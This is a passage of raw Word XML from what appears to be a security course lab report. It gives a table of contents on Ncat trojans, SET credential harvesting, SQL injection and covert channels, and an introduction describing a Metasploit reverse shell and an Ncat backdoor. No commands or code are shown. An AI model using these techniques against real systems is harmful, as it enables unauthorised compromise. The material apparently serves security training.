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5348BFF1"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2</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0C94C5E9" w14:textId="1CD06DDC" w:rsidR="00082497"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5876475" w:history="1">
            <w:r w:rsidR="00082497" w:rsidRPr="00C21AE4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.0</w:t>
            </w:r>
            <w:r w:rsidR="00082497">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00082497" w:rsidRPr="00C21AE4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Introduction – Using Ncat as a Trojan</w:t>
            </w:r>
            <w:r w:rsidR="00082497">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00082497">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00082497">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc145876475 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00082497">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00082497">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00082497">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="00082497">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="42794500" w14:textId="45F872F9"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76" w:history="1">
            <w:r w:rsidRPr="00C21AE4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C21AE4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> Lab Results – Using Ncat as a Trojan</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc145876476 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4158E42C" w14:textId="647513EA"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77" w:history="1">
            <w:r w:rsidRPr="00C21AE4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">1.2 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C21AE4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Technical Review – Using Ncat as a Trojan</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc145876477 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0A36374A" w14:textId="6FDCE12B" w:rsidR="00082497" w:rsidRDefault="00082497">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5876478" w:history="1">
            <w:r w:rsidRPr="00C21AE4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.0       Introduction – Credential Harvesting with SET</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc145876478 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5CF3DA69" w14:textId="7647DD30"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79" w:history="1">
            <w:r w:rsidRPr="00C21AE4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C21AE4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> Lab Results – Credential Harvesting with SET</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc145876479 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="120EE7C2" w14:textId="42366C1A"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80" w:history="1">
            <w:r w:rsidRPr="00C21AE4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">2.2 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C21AE4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Technical Review – Credential Harvesting with SET</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc145876480 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="60DDA962" w14:textId="0C68CC22" w:rsidR="00082497" w:rsidRDefault="00082497">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5876481" w:history="1">
            <w:r w:rsidRPr="00C21AE4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.0       Introduction – SQL Injection Chained Exploitation</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc145876481 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="32B7FF60" w14:textId="14C53EFB"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82" w:history="1">
            <w:r w:rsidRPr="00C21AE4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C21AE4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> Lab Results – SQL Injection Chained Exploitation</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc145876482 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="57CCD97E" w14:textId="766EFABB"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83" w:history="1">
            <w:r w:rsidRPr="00C21AE4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">3.2 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C21AE4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Technical Review – SQL Injection Chained Exploitation</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc145876483 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>26</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="68C0ABE2" w14:textId="13E9F8D6" w:rsidR="00082497" w:rsidRDefault="00082497">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5876484" w:history="1">
            <w:r w:rsidRPr="00C21AE4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.0       Introduction – Covert Channels/Evasion</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc145876484 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>27</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="428EF9A2" w14:textId="67E119CA"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85" w:history="1">
            <w:r w:rsidRPr="00C21AE4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C21AE4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> Lab Results – Covert Channels/Evasion</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc145876485 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>28</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="020B9159" w14:textId="34F8DCAE"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86" w:history="1">
            <w:r w:rsidRPr="00C21AE4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">4.2 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C21AE4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Technical Review – Covert Channels/Evasion</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc145876486 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>34</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="10D3C07A" w14:textId="4AF5AE30"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87" w:history="1">
            <w:r w:rsidRPr="00C21AE4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">5.0 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C21AE4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>References:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc145876487 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>35</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="268BC431" w14:textId="4B67751F" w:rsidR="00082497" w:rsidRDefault="00082497">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5876488" w:history="1">
            <w:r w:rsidRPr="00C21AE4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">6.0 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C21AE4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Activity Log</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc145876488 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>36</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3DB11407" w14:textId="5AF25B4C"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486AFAF6" w:rsidR="000F6E4F" w:rsidRPr="008E5A7C" w:rsidRDefault="007C3661" w:rsidP="008E5A7C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc145876475"/>
      <w:bookmarkEnd w:id="3"/>
      <w:bookmarkEnd w:id="2"/>
      <w:bookmarkEnd w:id="1"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Intro</w:t>
      </w:r>
      <w:r w:rsidR="005377C1">
        <w:t>duction</w:t>
      </w:r>
      <w:r w:rsidR="008E5A7C">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="00341037" w:rsidRPr="00341037">
        <w:t>Using Ncat as a Trojan</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="79016FAC" w14:textId="4A6F1CBE" w:rsidR="6C45EEC4" w:rsidRDefault="6C45EEC4" w:rsidP="0AF63564">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0AF63564">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">During </w:t>
      </w:r>
      <w:r w:rsidR="008E5A7C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>the execution of this lab</w:t>
      </w:r>
      <w:r w:rsidR="004B6534">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>, an evaluation was done to t</w:t>
      </w:r>
      <w:r w:rsidR="00D845E5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>est the ability of using Ncat to create an open backdoor to our potential victim.  In this attack, Metasploit is used to load a reverse TCP payload exploit.  This exploit allows us to attack the victim and from this reverse shell, upload our malicious script.  Once the malicious script is executed, Ncat can be used to open a listener port and with an escalated permissions user, such as root, to create a session allowing for a complete compromise of the instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD9F002" w14:textId="4F5DB0D4" w:rsidR="2B3D40CA" w:rsidRDefault="00D94693" w:rsidP="2B3D40CA">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:br w:type="column"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="033E5742" w14:textId="7796614D" w:rsidR="5E681EC7" w:rsidRDefault="00AD5F38" w:rsidP="2B3D40CA">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc145876476"/>
      <w:r>
        <w:t>1.1</w:t>
      </w:r>
      <w:r w:rsidR="5E681EC7">
